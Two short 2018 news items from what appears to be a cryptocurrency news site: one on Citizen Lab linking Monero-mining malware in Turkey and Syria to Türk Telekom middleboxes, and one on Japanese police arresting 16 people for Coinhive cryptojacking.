Monero mining malware linked to Turkish telecom company

Turkish Internet provider implicated in recent Monero mining virus epidemic in Middle East, says Citizen Lab in its report
12 March 2018   782

Recently there was a flood of Windows applications infected with Monero miner in Turkey and Syria. University of Toronto's Citizen Lab took an interest in this case and made a report. The results are surprising, to say the least.

The culprit was connected to to Türk Telekom – a formerly governmental Turkish telecommunications provider. According to the report, the ties to miner virus are connected to an unknown party with the access to provider's middleboxes, associated with government surveillance in Turkey and Syria. All this raises questions whether or not the virus itself is a product of some governmental effort at mining.

The infection scheme, called “AdHose”, is explained further in the report. The users are unknowingly redirected to infected copies of legitimate software while trying to download Windows applications such as Avast Antivirus, Ccleaner, 7-Zip or Opera, for example.

The spokesperson for the Türk Telekom reacted to the accusations and published a stetement, calling Citizen Lab allegations technically inaccurate and intentionally misleading. He also said that the company is currently investigating the issue, because they are “deeply commited to ethical technology development”.

The idea itself of government-controlled cryptocurrency mining malware is a little far-fetched in the expert's opinion, but the similar cases have already been reported by Open Observatory of Network Interference in 2016. At that time the Egyptian internet provider has been implicated in similar MITM-type attacks with malware and advertising present, minus the mining element.

Report: 16 Persons arrested for Monero Jacking in Japan

Coinhive has been installed by Japanese hackers on the websites with weak security to mine Monero - a privacy coin, what makes it harder to catch criminals
17 June 2018   99

A number of profile websites have been suffered from cryptojacking. This year eralier, Tesla’s website was applied by hackers in order to mine Monero with Coinhive. A bug in Drupal lead to 300 sites became infected with Coinhive, including the websites of San Diego Zoo and the government of Chihuahua. As declared in the official report of UK’s National Crime Agency (NCA), the issue is not going away in the near future:

Popular websites are likely to continue to be targets for compromise, serving cryptomining malware to visitors, and software is available that, when run in a webpage, uses the visiting computer’s spare computer processing power to mine the digital currency Monero.
National Crime Agency, the UK

The Japanese authorities have made significant progress in case of cryptojacking. Last week, it was displayed that the Japanese police was examining 3 suspects using Coinhive to run mining scripts in many sites surreptitiously. The recent report from local publication The Asahi Shimbun claimed that the police have now captured 16 persons from 10 prefectures for cryptojacking, aged between 18 and 48. The suspects had conducted their own websites, that they allegedly applied to transfer programs to the visitors of their site for mining digital money without the consent of the users.

All suspects, except one, had used Coinhive. The one person had created his own program, very similar to Coinhive and he has been detained on suspicion of making a computer virus. Although Coinhive is free to install, it processes on a 70/30 model. Only 70% of the Monero mined goes to the website operator, and the remaining 30% goes to Coinhive developers.

The individuals that had only set Coinhive on the websites they owned and not on the hacked sites, were arrested nevertheless as they did not get any permission from their visitors to mine cryptocurrencies.